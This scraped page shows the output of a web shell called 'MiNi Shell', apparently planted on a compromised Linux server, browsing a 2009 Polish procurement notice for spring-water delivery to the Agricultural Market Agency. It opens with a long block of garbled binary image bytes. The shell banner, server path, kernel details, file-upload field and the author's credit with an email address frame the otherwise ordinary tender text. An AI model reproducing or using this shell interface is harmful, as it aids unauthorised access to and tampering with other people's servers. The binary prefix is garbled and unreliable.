JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20091016/179783-N-2009.html

<p class="kh_header"><b>Warszawa: Sprzedaż i sukcesywna dostawa wody źródlanej do Centrali Agencji Rynku Rolnego 
i Oddziałów Terenowych ARR</b><br>
<b>Numer ogłoszenia: 179783 - 2009; data zamieszczenia: 16.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rynku Rolnego , ul. Nowy Świat 6/12, 00-400 Warszawa, woj. mazowieckie, tel. 022 6617347, faks 022 6617535.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sprzedaż i sukcesywna dostawa wody źródlanej do Centrali Agencji Rynku Rolnego 
i Oddziałów Terenowych ARR.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
a) sprzedaż i sukcesywna dostawa do Centrali Agencji Rynku Rolnego i Oddziałów Terenowych ARR wody źródlanej w 15 - 20 litrowych butlach zwrotnych w ilości 22 000 sztuk,
b) bezpłatne użyczenie dystrybutorów i stojaków na butle (na czas obowiązywania umowy), zgodnie ze specyfikacją ilościową określoną poniżej:
CENTRALA ARR
- dystrybutor dozujący wodę schłodzoną i wodę gorącą - 38 szt.
(przystosowany do postawienia bezpośrednio na podłodze, bez potrzeby stosowania dodatkowych elementów podwyższających dany dystrybutor).
- stojak na 2 butle - 36 szt.
- dystrybutor dozujący wodę w temperaturze pokojowej - 4 szt.
- duży stojak - 2 szt.
ODDZIAŁY TERENOWE ARR
- dystrybutor dozujący wodę schłodzoną i wodę gorącą - 42 szt.
(przystosowany do postawienia bezpośrednio na podłodze, bez potrzeby stosowania dodatkowych elementów podwyższających dany dystrybutor).
- stojak na 2 butle - 42 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 41.11.00.00-3.</p>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W postępowaniu wymagane jest wniesienie wadium w wysokości 5.000,00 PLN (słownie: pięć tysięcy złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O zamówienie mogą ubiegać się Wykonawcy, którzy spełniają poniższe warunki:
a) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych, b) spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych
oraz złożą prawidłowo dokumenty wymienione w rozdziale VII.
2. Złożenie przez wykonawców w ofercie dokumentów i oświadczeń, wymienionych w rozdziale VII będzie stanowiło podstawę do oceny spełniania warunków udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń, czy wykonawca spełnia wszystkie w/w warunki udziału w postępowaniu wg formuły spełnia - nie spełnia. Zamawiający wykluczy z postępowania wykonawcę, który nie spełnia wymaganych warunków oraz jeżeli stwierdzi, że dostarczone przez niego informacje mające wpływ na wynik prowadzonego postępowania są nieprawdziwe..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawcy ubiegający się o udzielenie zamówienia muszą złożyć wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej następujące dokumenty i oświadczenia: a) oświadczenie o spełnianiu warunków udziału w postępowaniu (zgodne ze wzorem stanowiącym załącznik nr 1), b) odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w licytacji elektronicznej..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> http://licytacje.uzp.gov.pl</p>
<p><b>IV.3.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> www.arr.gov.pl</p>
<p><b>IV.3.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1. Z platformy w pełnym zakresie mogą korzystać wyłącznie Wykonawcy zarejestrowani w systemie pod adresem http://licytacje.uzp.gov.pl. 
2. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału w licytacji, obowiązany jest zarejestrować się w systemie dostępnym na stronie http://licytacje.uzp.gov.pl, a wraz z wnioskiem o dopuszczenie do udziału w licytacji elektronicznej powinien przekazać Zamawiającemu informację o swoim loginie, poprzez wpisanie takiej informacji na formularzu wniosku o dopuszczenie do udziału w licytacji elektronicznej. 
3. W przypadku podania przez Wykonawcę niewłaściwego loginu (login należy podać dokładnie stosując te same znaki w tym duże i małe litery jeżeli takie zastosowano przy rejestracji) bądź nie przekazania go Zamawiającemu wraz z Wnioskiem, Wykonawca jest zobowiązany do jego przekazania najpóźniej jeden dzień przed terminem otwarcia licytacji. Nie dostarczenie loginu w sposób i w terminie określonym powyżej będzie traktowane jako odstąpienie Wykonawcy od dalszego postępowania.
4. Wymagania techniczne: Komputer klasy PC z systemem operacyjnym Windows/Linux oraz przeglądarka internetowa Internet Explorer 6.0 lub wyższa lub Firefox 2.0 lub wyższa.
5. Nie jest wymagany podpis elektroniczny..</p>
<p><b>IV.3.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1. W trakcie licytacji Wykonawca podaje cenę brutto (z VAT) za wykonanie całego zamówienia. W toku licytacji elektronicznej Zamawiający na bieżąco przekazuje wszystkim wykonawcom informacje o pozycji składanych przez nich ofert, liczbie wykonawców biorących udział w licytacji, także o cenach złożonych przez nich ofert, z tym, że do momentu zamknięcia licytacji elektronicznej nie ujawnia informacji umożliwiających identyfikację Wykonawców.
2. Cena wywoławcza: 322 080,00 PLN brutto (słownie: trzysta dwadzieścia dwa tysiące osiemdziesiąt złotych). 
3. Minimalny krok postąpienia: 100,00 PLN brutto (słownie: sto złotych).
4. W przypadku złożenia oferty, której wybór prowadziłby do powstania obowiązku podatkowego zamawiającego zgodnie z przepisami o podatku od towarów i usług w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, zamawiający w celu oceny takiej doliczy do przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi przepisami.
5. W związku z wykonaniem umowy zawartej w wyniku przedmiotowego zamówienia publicznego rozliczenia między zamawiającym i wykonawcą będą prowadzone wyłącznie w złotych polskich i nie będą prowadzone w walutach obcych..</p>
<p><b>IV.3.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li>
<table>
<tr><td style="font-size: 10pt;"><b>etap nr</b></td><td width="20px;"><td style="font-size: 10pt;"><b>czas trwania etapu</b></td></tr>
<tr><td valign="top" style="font-size: 10pt;">1</td><td></td><td style="font-size: 10pt;">Etap zostanie zakończony, jeżeli w ciągu 5 minut od złożenia najkorzystniejszego postąpienia, żaden z Wykonawców nie złoży korzystniejszego postąpienia lub gdy w okresie 5 minut od otwarcia licytacji nie zostanie złożone żadne postąpienie.</td></tr>
</table></li></ul>
<p><b>Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną <i>zakwalifikowani</i> do następnego etapu?</b> nie.</p>
<p><b>IV.3.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 26.10.2009 godzina 12:00, miejsce: Agencja Rynku Rolnego w Warszawie, ul. Nowy Świat 6/12, w Kancelarii Ogólnej, hol główny, parter, wejście D/A..</p>
<p><b>IV.3.12) Termin otwarcia licytacji elektronicznej:</b> Pięć dni od dnia przekazania Wykonawcom zaproszenia do składania ofert o godz. 12:00. Ostateczny termin otwarcia licytacji Zamawiający poda w zaproszeniu do udziału w licytacji elektronicznej.</p>
<p><b>Termin zamknięcia licytacji elektronicznej:</b> Licytacja zostanie zamknięta, jeżeli w ciągu 5 minut od złożenia najkorzystniejszego postąpienia, żaden z Wykonawców nie złoży korzystniejszego postąpienia lub gdy w okresie 5 minut od otwarcia licytacji nie zostanie złożone żadne postąpienie..</p>
<p><b>Warunki zamknięcia licytacji elektronicznej:</b> Zamawiający zamyka licytację elektroniczną w terminie określonym powyżej..</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Istotne Postanowienia Umowy
§ 1
Przedmiot Umowy
1. Przedmiotem umowy jest:
a) sprzedaż i sukcesywna dostawa do Centrali ARR i Oddziałów Terenowych ARR wody źródlanej w 15 - 20 litrowych butlach zwrotnych, zwanych dalej butlami w ilości 22 000 sztuk. 
b) bezpłatne użyczenie dystrybutorów i stojaków na butle, zgodnie ze specyfikacją ilościową określoną w załączniku Nr 1 do umowy, stanowiącym integralną część umowy, a także usługą ich konserwacji i sanityzacji.
2. Dostawy wody źródlanej realizowana będą sukcesywnie w terminach 
i ilościach określonych każdorazowo przez Zamawiającego zgodnie 
z zamówieniem przekazanym w trybie określonym w § 3 i 4, w okresie od dnia podpisania umowy do dnia 31 grudnia 2012 r. lub do wyczerpania ilości butli, 
o których mowa w ust. 1 pkt a) umowy. 
3. Dostawa dystrybutorów i stojaków, zwanych dalej urządzeniami, nastąpi niezwłocznie po zawarciu Umowy, a w każdym razie nie później niż z pierwszą dostawą wody źródlanej.
4. Usługa konserwacji i sanityzacji realizowana będzie okresowo w ramach potrzeb wynikających z utrzymania urządzeń w należytym stanie technicznym 
i higienicznym.
§ 2
Warunki realizacji Umowy
1. Wykonawca pokryje koszty związane z dostarczeniem i wydaniem towaru do miejsc przeznaczenia wskazanych zgodnie z § 3 i § 4.
2. Zamawiający nie zwraca kosztów dojazdu, ani żadnych innych kosztów dodatkowych, w tym kosztów konserwacji i sanityzacji.
3. Zamawiający nie wypłaca zaliczek na poczet poszczególnych dostaw wody źródlanej.
4. Urządzenia i butle pozostają przez cały czas trwania umowy własnością Wykonawcy. Zamawiający nie może ich oddać do bezpłatnego używania, 
w podnajem albo wydzierżawić.
5. Zamawiający nie jest także uprawniony do ustanawiania na urządzeniach i butlach żadnych innych praw na rzecz osób trzecich oraz przenoszenia praw i obowiązków wynikających z niniejszej umowy na osoby trzecie.
6. Wykonawca zobowiązuje się do przestrzegania obowiązujących postanowień Wytycznych Bezpieczeństwa Informacji dla Kontrahentów stanowiących załącznik Nr 2 do niniejszej umowy, który jest jej integralną częścią.
§ 3
Dostawa do Centrali ARR
1. Wykonawca będzie dostarczał wodę źródlaną raz w tygodniu do Centrali Agencji Rynku Rolnego w Warszawie, ul. Nowy Świat 6/12.
2. W przypadku zmiany adresu siedziby Centrali Agencji Rynku Rolnego Wykonawca realizować będzie dostawy pod nowy adres, bez wzrostu kosztów z tego tytułu, o ile adres ten znajdować się będzie na terenie Warszawy.
3. Wykonawca dostarczy wodę źródlaną w okresie do siedmiu dni po otrzymaniu od Zamawiającego faktycznego zamówienia (przekazanego za pośrednictwem faks___).
4. Upoważnionym do składania zamówień jest Kierownik Działu Administracyjno-Gospodarczego w Centrali Agencji Rynku Rolnego.
§ 4
Dostawa do OT ARR
1. Wykonawca będzie dostarczał wodę źródlaną dwa razy w miesiącu do Oddziałów Terenowych Agencji Rynku Rolnego, zgodnie z rozdzielnikiem adresowym stanowiącym załącznik Nr 3 do umowy.
2. W przypadku zmiany adresu siedziby Oddziału Terenowego Agencji Rynku Rolnego Wykonawca realizować będzie dostawy pod nowy adres, bez wzrostu kosztów z tego tytułu, o ile adres ten znajdować się będzie w obrębie tej samej miejscowości.
3. Wykonawca dostarczy wodę źródlaną w okresie do siedmiu dni po otrzymaniu od Zamawiającego faktycznego zamówienia (przekazanego za pośrednictwem faksu ___).
4. Upoważnionym do składania zamówień jest Kierownik Sekcji Administracyjnej 
danego Oddziału Terenowego Agencji Rynku Rolnego.
§ 5
Wartość przedmiotu umowy i warunki płatności
1. Wartość przedmiotu umowy, o którym mowa w § 1 wynosi kwotę netto ____ (słownie:___ złotych) plus należny podatek VAT w wysokości 22%, co stanowi kwotę brutto ___(słownie: _____ złotych).
2. Cena jednostkowa butli wynosi kwotę netto ____ (słownie:___ złotych) plus należny podatek VAT w wysokości 22%, co stanowi kwotę brutto ___ (słownie:___ złotych), która jest niezmienna w całym okresie obowiązywania umowy.
3. Zamawiający zapłaci Wykonawcy kwotę ustaloną po każdorazowej dostawie wody źródlanej do Centrali i poszczególnych Oddziałów Terenowych ARR, zgodnie z warunkami oferty w terminie 14 dni od dnia otrzymania prawidłowo sporządzonej faktury VAT, wystawionej na Centralę ARR.
4. Zapłata nastąpi przelewem na rachunek bankowy Wykonawcy wskazany na fakturze.
5. Podstawę do wystawienia faktury za sukcesywną dostawę wody źródlanej do Centrali ARR i OT ARR będzie protokół zdawczo-odbiorczy, stanowiący załącznik Nr 4 do umowy, potwierdzający zgodność dostawy z przedmiotem zamówienia i podpisany przez:
a) upoważnionego pracownika Działu Administracyjno-Gospodarczego w Centrali ARR, 
b) upoważnionego pracownika Sekcji Administracyjnej w Oddziale Terenowym  ARR.
6. Płatnikiem wystawianych przez Wykonawcę faktur jest Centrala Agencji Rynku Rolnego w Warszawie, ul. Nowy Świat 6/12.
§ 6
Prawa i obowiązki Stron
1. Zamawiający jest zobowiązany używać urządzeń i butli zgodnie z ich przeznaczeniem i dostarczonymi przez Wykonawcę instrukcjami obsługi oraz utrzymywać je w czystości. 
2. Instrukcje obsługi stanowią integralną część umowy, pod warunkiem ich dostarczenia Zamawiającemu przed jej zawarciem.
3. Przy zachowaniu zasad wynikających z ust. 1 i 2 Wykonawca nie ponosi odpowiedzialności za szkody poniesione przez Zamawiającego lub osoby trzecie spowodowane użytkowaniem urządzeń i butli niezgodnie z instrukcjami obsługi.
4. Zamawiający zobowiązuje się do używania wraz z urządzeniami wyłącznie wody dostarczanej przez Wykonawcę.
5. Zamawiający nie będzie dokonywał żadnych napraw, zmian ani trwale demontował jakichkolwiek części urządzeń oraz napełniał butli we własnym zakresie.
6. Zamawiający powiadomi niezwłocznie Wykonawcę o każdym uszkodzeniu urządzenia lub butli.
7. Wykonawca ma prawo do kontrolowania prawidłowości używania urządzeń i butli przez Zamawiającego, a Zamawiający zapewni Wykonawcy dostęp do urządzeń i butli. 
8. Zamawiający ponosi odpowiedzialność za działania własne lub osób trzecich powodujące nieprawidłowe używanie lub uszkodzenie, zniszczenie (w tym m.in. zabrudzenie lub zanieczyszczenie), utratę urządzeń lub butli. W przypadku utraty, uszkodzenia lub zniszczenia w stopniu dyskwalifikującym urządzenia lub butle z dalszego obrotu, Wykonawca ma prawo żądać od Zamawiającego zapłaty kwoty stanowiącej aktualną równowartość urządzenia lub równowartość nowej butli.
9. Zmiana miejsca zainstalowania urządzenia jest możliwa za uprzednim zawiadomieniem Wykonawcy na piśmie, w terminie nie później niż na 14 dni przed planowaną zmianą. Wykonawca ma prawo odmówić zgody na zmianę miejsca zainstalowania urządzeń, na piśmie, w terminie 7 dni od daty zawiadomienia. 
10. Wykonawca zobowiązuje się do bezpłatnych napraw zainstalowanych urządzeń wynikających z ich normalnego używania. W przypadku, gdy naprawa nie może być wykonana w miejscu zainstalowania, Wykonawca dokona bezpłatnej wymiany urządzenia.
11. Koszty napraw lub wymiany urządzeń wynikających z ich używania niezgodnie z ich przeznaczeniem lub instrukcjami obsługi ponosi Zamawiający. 
12. Wykonawca zobowiązuje się raz na kwartał przeprowadzić sanityzacię, dystrybutorów, rozstawionych w placówkach Zamawiającego.
13. Na życzenie Zamawiającego, Wykonawca może dokonać wymiany sprawnego urządzenia na inne za dodatkową opłatą.
§ 7
Kary umowne
1. Wykonawca zapłaci Zamawiającemu karę umowną w przypadku zwłoki 
w dostawie wody źródlanej w wysokości 0,25 % wartości brutto danej dostawy za każdy dzień zwłoki.
2. W wypadku nie wykonania lub nienależytego wykonania, a także odstąpienia od umowy przez Wykonawcę, zapłaci on Zamawiającemu karę umowną w wysokości 10 % wartości brutto niezrealizowanej umowy.
3. Zamawiający może dochodzić na zasadach ogólnych odszkodowania przewyższającego wysokość kar umownych.
§ 8
Postanowienia końcowe
1. Wszelkie zmiany niniejszej umowy wymagają formy pisemnej pod rygorem nieważności.
2. W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie umowy nie leży w interesie publicznym, której nie było można przewidzieć w chwili zawarcia umowy. Zamawiający może odstąpić od umowy w terminie 30 dni od powzięcia wiadomości. Wykonawca może w takim wypadku żądać jedynie wynagrodzenia należnego z tytułu wykonania części umowy.
3. W sprawach nieuregulowanych niniejszą umową mają zastosowanie przepisy Kodeksu cywilnego i ustawy Prawo zamówień publicznych.
4. Wszystkie ewentualne spory mogące wynikać w związku z niniejszą umową rozpatrywane będą przez sądy powszechne właściwe miejscowo dla siedziby Zamawiającego.
5. Umowę sporządzono w dwóch jednobrzmiących egzemplarzach po jednym dla każdej ze stron.

Creat By MiNi SheLL
Email: jattceo@gmail.com